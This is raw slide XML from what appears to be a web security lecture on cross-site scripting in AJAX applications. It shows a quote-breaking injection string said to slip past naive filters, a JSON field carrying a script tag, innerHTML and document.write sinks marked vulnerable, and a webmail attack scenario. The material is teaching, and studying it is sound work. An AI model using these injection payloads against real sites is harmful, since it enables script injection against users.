                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>downstreamArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[0] = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>42"; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>doBadStuff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(); var bar=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ajacked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Won’t be detected by a naïve filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>No &lt;&gt;, “script”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Just need to break out of double quotes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5BE917E-61EF-2C4F-960D-8A10D20BB0C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9744500" y="6046129"/>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60737760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A4C7D5A-3AEB-8E45-B0FD-D3CFA28469FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>XSS in AJAX (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Content Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0803123-F374-904B-ABD5-BB8C5FABB0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066799" y="2103120"/>
            <a:ext cx="10601625" cy="4112286"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>JSON written into DOM by client-side script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>inboundJSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = {"people": [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>{"name": "Joel", "address": “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>badStuff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>();&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>", </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> "phone": "911"} ] };</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>someObject.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>inboundJSON.people</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[0].address);	// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>document.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>inboundJSON.people</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[0].address);	 	// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>someObject.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>innerText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>inboundJSON.people</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[0].address);	// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Safe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8744B0CA-C708-A04A-A5AE-6FF4F0999A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9744500" y="6046129"/>
            <a:ext cx="1923925" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>Source: Alex Stamos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D97F130-C085-4444-8244-90DA87A486D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066798" y="5338243"/>
            <a:ext cx="6201566" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>XSS may be already in DOM!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.referer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122942968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D35AB7D-5FB6-B246-99E7-16746832B1E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>“Backend” AJAX Requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B15F7EC4-28E8-A14E-9229-F08F64F0EFFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2103120"/>
            <a:ext cx="10058400" cy="4112286"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Client-side script retrieves data from the server using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> and uses it to build HTML page in browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This data is never intended to be rendered directly by the browser!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Example: web mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-304800">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Request:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-304800">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET http://www.webmail.com/mymail/getnewmessages.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-304800">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Response:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-304800">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>messageArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = new Array(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-304800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>messageArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[0] = “This is an email subject”;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87046" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF527140-D943-D046-93A6-B3D4F69A1C04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5717279" y="4882196"/>
            <a:ext cx="4283122" cy="535531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="1905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en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Raw data, intended to be converted into HTML inside the browser by the client-side script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87047" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DE75097-E73B-3147-8E1A-3CA001484065}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5349922" y="5410199"/>
            <a:ext cx="367356" cy="267269"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="158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8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EF71690-AB27-DE4C-9129-2F1966F62EB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9744500" y="6046129"/>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418074782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6AF1E67C-EB76-714F-860F-35B0D9077952}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>XSS in AJAX (3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11AE39FA-1E1A-E243-9E88-8D723EB6049D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066799" y="2103120"/>
            <a:ext cx="10738514" cy="3849624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker sends the victim an email with a script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Email is parsed from the data array, written into HTML with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>innerText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(), displayed harmlessly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker sends the victim an email with a link to backend request, victim clicks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="636270" lvl="1" indent="-304800">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="008080"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The browser will issue this request:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET http://www.webmail.com/mymail/getnewmessages.aspx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
